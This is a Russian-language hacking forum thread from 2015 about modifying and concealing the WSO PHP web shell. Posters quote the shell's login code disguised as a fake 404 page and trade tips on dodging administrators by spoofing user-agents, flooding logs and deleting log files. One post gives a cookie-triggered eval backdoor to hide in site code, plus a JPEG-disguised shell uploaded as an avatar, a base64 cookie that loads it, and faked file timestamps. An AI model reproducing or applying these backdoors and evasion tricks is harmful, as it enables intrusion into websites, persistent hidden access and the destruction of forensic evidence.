 |
|
20.07.2015, 05:24
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
Сообщение от Expl0ited
↑
И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?
Он ничего не добавил, самое смешное смотреть за историей правок файла. Кстати за основу был взят wso 2.1 этот хакир видимо не знает даже происхождение шелла и что есть 2.5 версия. Во всем виноваты каникулы.
1)
Код:
-/* WSO 2.1 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by oRb) */
2)
Код:
-/* WSO 2.2.0 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by Pirat) */
3)
Код:
-/* WSO 2.2.0 (Web Shell by Pirat) */
+/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
4)
Код:
-$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
5)
Код:
-$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
PS Для чего была вставлена строка?
|
|
|
20.07.2015, 15:04
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от grimnir
↑
усвершенствованая функция скрытия
Жмем на 80 ,появляется окно ввода пароля
код
Код:
function wsoLogin() {
die("
404 Not Found
Not Found
The requested URL index.php was not found on this server.
Apache/2.2.22 (Linux) Server at Port 80
Password: >'>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) wsoLogin();
}
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
|
|
|
|
20.07.2015, 15:17
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
Сообщение от yarbabin
↑
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
Отличая идея,что-то не подумал сразу.
|
|
|
|
20.07.2015, 15:40
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
С нами:
10991846
Репутация:
2054
|
|
Сообщение от yarbabin
↑
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
Сообщение от grimnir
↑
Отличая идея,что-то не подумал сразу.
И палить шелл GET-ом, а про cookie, user-agent, accept-language и т.п. уже забыли.
__________________
Лучший способ защиты - это нападение!!!
|
|
|
|
20.07.2015, 18:39
|
|
Постоянный
Регистрация: 05.06.2015
Сообщений: 560
С нами:
5758166
Репутация:
5
|
|
http://kronus.me/cn/wso-builder/1.04/
понравилась онлайн версия билдера wso
возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)
и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!
|
|
|
|
20.07.2015, 18:42
|
|
Постоянный
Регистрация: 05.06.2015
Сообщений: 560
С нами:
5758166
Репутация:
5
|
|
Сообщение от yarbabin
↑
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
можно браузер чекать по useragent - а его рандомно сделать и грузить через useragent switcher + проверка по Ip если потребуется - мне эти способы нравятся, самое хреновое если админ видет что туда обращение идёт через логи
в логах видно что идут запросы, но если сайт крупный и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться, но я удаляю файлы логов
|
|
|
|
21.07.2015, 00:33
|
|
Участник форума
Регистрация: 08.05.2015
Сообщений: 200
С нами:
5798486
Репутация:
28
|
|
на крупных ресурсах как раз мониторят на фронтах еррор логи от бек эндов, и когда отдается тот же 404 больше шансов что заметят, чем 200 ок
|
|
|
|
21.07.2015, 01:52
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
С нами:
10991846
Репутация:
2054
|
|
Сообщение от dondy
↑
самое хреновое если админ видет что туда обращение идёт через логи
***
и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться
Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]***
[/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logout'[/COLOR][COLOR="#007700"]]);
***
if (isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logout'[/COLOR][COLOR="#007700"]]))
{@die(eval([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]));}
[/COLOR][/COLOR]
поправить время через touch, залить jpeg-шелл в аватарки/etc и печеньку подсунуть
Код:
logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy91c2VyLmpwZyIpOw==
Вариантов много, лиж бы фантазии хватило.
__________________
Лучший способ защиты - это нападение!!!
|
|
|
|
21.07.2015, 07:36
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
|
|
|
|
22.07.2015, 01:04
|
|
Постоянный
Регистрация: 05.06.2015
Сообщений: 560
С нами:
5758166
Репутация:
5
|
|
а что за файлы в билдере такие с расширением .inc?
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
